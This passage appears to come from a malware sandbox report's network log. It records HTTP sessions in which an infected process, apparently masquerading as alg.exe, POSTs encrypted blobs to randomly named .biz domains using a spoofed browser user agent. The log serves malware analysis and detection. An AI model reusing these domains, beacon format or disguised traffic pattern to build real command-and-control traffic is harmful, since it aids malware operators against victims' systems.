                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:23.350121021 CET  842  OUT  Data Raw: 10 8a 6e 36 2f 44 39 2d 3e 03 00 00 66 99 cb 94 10 39 cc c3 32 f0 d6 2a 22 05 b8 c3 f8 cd 13 74 cf 19 78 21 54 cf b1 07 c8 5b 96 86 9e 9c 66 af 9c bc c9 5c 34 09 b1 1c da 89 b5 3b 92 8e 71 8e 2d c4 19 bd 5d 4f 4c 09 63 4c b7 2f 5d 35 86 f4 19 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: n6/D9->f92*"tx!T[f\4;q-]OLcL/]5ON31lN/Bl>*QL1d\[o6KPw6f._A(m4x1kfoUSpPJ]VKtdlo]c'obsax>Wv<W
Nov 18, 2024 09:58:23.525129080 CET  170  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
89          192.168.2.7  50068        54.244.188.177  80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:23.547789097 CET  353  OUT  POST /cuqmfcku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:23.547789097 CET  842  OUT  Data Raw: a7 b1 29 ab 51 0a 4c f0 3e 03 00 00 eb ef 03 d0 4a 74 22 0c 0e 1c 5e b2 7a 37 b6 f9 af a4 c5 75 7d 95 aa 12 d7 0d 93 54 1f 80 12 d6 b1 b0 0f 96 51 6a ce e8 d6 d6 23 f4 42 cb 6b c5 a3 a4 55 7f 02 75 80 97 ab 92 38 91 e6 fe ff 10 5f d6 44 f1 11 26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: )QL>Jt"^z7u}TQj#BkUu8_D&Mj\vbGe9H3 " mv[bd2mnP.<k{*SUK5%T]df(rpUdr=N7QXt;!>*Q3D0{E
Nov 18, 2024 09:58:24.386568069 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f740dc18c7e55a68f20dd23a1a39ecb8|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
90          192.168.2.7  50069        18.208.156.248  80                5368  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:24.088618040 CET  349  OUT  POST /ngmt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:24.088685989 CET  778  OUT  Data Raw: 86 8a 3b a1 f0 ac eb 88 fe 02 00 00 13 41 a4 a2 69 a0 77 d3 53 f3 5d ec f8 77 f5 2a 80 1f d6 fc 85 cc d7 b1 dd 95 b6 ed ad df 08 9d 17 2c 6a 8c 82 df 04 63 bf fc a6 3f 63 5f e5 12 72 c8 88 04 f6 13 3c 2c 28 07 c1 da 8b 78 cf 84 f0 30 6c 53 2b 98
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;AiwS]w*,jc?c_r<,(x0lS+n[Y?7.uhU1rylZ{T}^9_ uRR!#yr?.^q61G5n45pX('TN"({nosd3G-l3
Nov 18, 2024 09:58:24.766616106 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=06b37bbb4f0729a01c5c176600dec33b|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.2.7 | 50070 | 34.211.97.45 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:24.711086988 CET | 348 | OUT | POST /mmajvqk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:24.711086988 CET | 842 | OUT | Data Raw: 66 76 0f 92 12 ae f6 77 3e 03 00 00 b2 90 87 df ab 3a 27 bd 36 36 e5 d5 db 0a 96 9b b7 97 6c 05 9f d9 85 4a 3c 56 e2 e6 02 ce b9 3b c1 42 0d c4 79 5e 31 b4 a5 27 01 55 3d 4d f7 ec d2 36 03 7c d9 0f fb 94 28 0a b8 da 96 91 0d 90 b4 d4 d3 70 c3 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: fvw>:'66lJ<V;By^1'U=M6|(pMhRh@?r7DE,\-l5ncH<AQKEi*'x5N,M6v/m@@Jix <k|D\I|#mj:F &RifE)qBgIz7M,_V
Nov 18, 2024 09:58:25.543222904 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=dfbbf9501aceedfea6d38609d3599db5|155.94.241.187|1731920305|1731920305|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.7 | 50071 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:25.187603951 CET | 350 | OUT | POST /vudapeuv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:25.187663078 CET | 778 | OUT | Data Raw: c2 99 3b 92 c6 b3 c1 cb fe 02 00 00 a2 e3 24 f8 0d f1 f9 07 5a b9 19 27 a4 1f 3d 27 68 08 ee 8b ac 52 c1 95 e0 41 f1 d8 04 d4 cb 39 1e db c0 c2 68 0a e9 c6 b4 b9 5b f8 83 57 45 0d 7f b7 09 80 2f 7a 41 0c 7d d4 f5 1f 4d 25 9c 31 7c c6 18 3f 62 09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;$Z'='hRA9h[WE/zA}M%1|?bqZOxE@H|im2jczvS)Y?Y*;k9-Q{;}+P1tbg#yleZ;[RW=F[jtX;hOnUOB+0`k!,@cvCw13#0f2
Nov 18, 2024 09:58:26.628956079 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=99a4cd3fd2a23030d059fa263a7c4d14|155.94.241.187|1731920306|1731920306|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.2.7 | 50072 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:25.584867954 CET | 359 | OUT | POST /qirifxoxiwrelcr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:25.584867954 CET | 842 | OUT | Data Raw: 8f 2e 3d 39 f6 1f 38 21 3e 03 00 00 61 21 22 74 87 ee 49 a3 66 8e 12 76 60 a6 c7 bc 38 9a 74 26 07 01 bd 7f 7f 2b 4b 7b d1 97 d8 61 15 c6 9a 51 a7 61 d9 2a d8 78 8d c1 22 ef 90 b8 c1 4d e9 24 5a 6f cc cd 7a 4d 6c fd f1 d7 d1 81 80 9b 2f fe 5f b3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: .=98!>a!"tIfv`8t&+K{aQa*x"M$ZozMl/_4OE\m+GDBc4+Z$Vfsb%YB%D%&j"Pp3\>`m>WOhPuXT>Btq<X^WRM'Rol>OXKH\sN/TA6\
Nov 18, 2024 09:58:26.416261911 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=93fae4186cbcfd0f4f0ccfd51ded2fb9|155.94.241.187|1731920306|1731920306|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
94 | 192.168.2.7 | 50073 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:26.435285091 CET | 347 | OUT | POST /vhuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435323954 CET842OUTData Raw: 53 55 2e f6 d3 0f 95 45 3e 03 00 00 e7 4b 07 71 7b 97 92 ac 8b 88 5c ba 73 10 0a 5e 97 c5 dd a4 a8 a7 1a 49 06 04 0f 9e 32 e7 5c 45 02 f9 a7 b9 98 49 c2 15 f2 c0 ac cb 07 e7 cb 2c a2 ba ad cc 11 31 cc 1b 10 3a 63 a4 31 66 bf 4a 41 d9 58 e3 0c 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SU.E>Kq{\s^I2\EI,1:c1fJAXFu8|'Ld>o!QMw/PX<nOcaM nZC/"*]f%b8qFju`stQ@Y&.wR=S^L2O|_JUi>V
Nov 18, 2024 09:58:27.890146017 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9975fae3d207131ce21f81930c161e52|155.94.241.187|1731920307|1731920307|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.7 | 50074 | 34.246.200.160 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:27.233120918 CET | 352 | OUT | POST /vjfojjg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET778OUTData Raw: ab 16 50 20 6b c7 ad fc fe 02 00 00 f9 64 29 26 79 37 e4 2b 3f 02 d0 37 70 62 16 89 e4 3e 53 29 67 4f 47 8f 25 85 0e df 71 db 19 2f 27 d8 9f 3b 4f 62 bf a4 12 b5 73 0d a1 aa 86 01 b2 8d c2 1b ae fa 41 87 6d 10 2f 7c f7 46 ac b2 08 12 6d af 12 10
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: P kd)&y7+?7pb>S)gOG%q/';ObsAm/|Fmi|Qg~RM;#Mf_ZI#X@;qvy&>mL!gQ1~EY2#t`"hU3S'YP,cLf%M6<J!~kvMyf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.7 | 50075 | 34.246.200.160 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:27.761553049 CET | 347 | OUT | POST /xu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET778OUTData Raw: f1 d0 63 88 33 d3 3c 93 fe 02 00 00 1b 46 f9 ef 8a 42 ef 65 28 7d 05 bb 32 7b 84 cc 01 cc af e7 4d df f6 c7 27 44 e6 d4 0a a5 8a dd 9f d5 fc 9d aa 95 3b a7 6e df fa a3 79 17 8b 22 72 82 2d 60 f1 84 e3 fa 31 30 0f 81 30 3a f1 79 f5 16 ce db 2a ad
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: c3<FBe(}2{M'D;ny"r-`100:y*|"@Aij>cci3YG&SpQFQ<yWLFN9".SB#AnPsRKg,q-}YmNycVF3cX<bW}
Nov 18, 2024 09:58:28.722635031 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=90cd308dfe2e28bf885c8d7991a0835f|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
97 | 192.168.2.7 | 50076 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:27.908274889 CET | 343 | OUT | POST /pb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:27.908292055 CET | 842 | OUT | Data Raw: 41 80 8d fc 1f d2 12 39 3e 03 00 00 b9 7c 73 03 36 00 dc 24 e3 6b aa b3 07 0a 9b 8c 7c a6 7d 74 82 5b 22 17 0a 56 1b 33 c4 d9 0b 66 ad d6 3f 0f 15 00 44 16 29 82 ad 69 78 81 1f 6f e4 1d b8 ce 04 25 cd 3a e2 82 58 f4 8a 34 1e 9e e4 33 4f ea 67 ab
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: A9>|s6$k|}t["V3f?D)ixo%:X43Og_dNcgR:SyIOaPN~{}D<$A*IMxHLbB-Ht\X7;S{Q[g&n?Rz-WjA`+NbZtB}tBX^7'+6M~k3
Nov 18, 2024 09:58:28.584336996 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=333b856d9b87704c4e7ef720ade29d59|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
98 | 192.168.2.7 | 50077 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:28.634391069 CET | 353 | OUT | POST /bbdsvdesg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:28.634407043 CET | 842 | OUT | Data Raw: 3c 9e 05 19 34 54 50 38 3e 03 00 00 ac 51 6b 54 d1 ca 46 46 57 b4 cb 45 db 7b 1e 6e e2 b0 bf aa 2d 94 ac 34 41 95 c4 5f 6c 50 be bf e2 92 72 e9 77 de 43 e0 c6 10 18 1b fa 4a 69 f2 bc e6 55 a0 f2 bd 9c 0d 26 03 2c 75 51 1a 5a c7 c7 10 b0 fc 4d ea
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <4TP8>QkTFFWE{n-4A_lPrwCJiU&,uQZM#E{#<BD3dlI)^fSkXnBmbz@uY(CyglRcnemc?UE,M)W~]Y)=B]CW
Nov 18, 2024 09:58:29.276596069 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0d65647373a0b802e3f642407747c3bd|155.94.241.187|1731920309|1731920309|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.7 | 50078 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:29.053622007 CET | 359 | OUT | POST /fvijpyejxccmhfmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
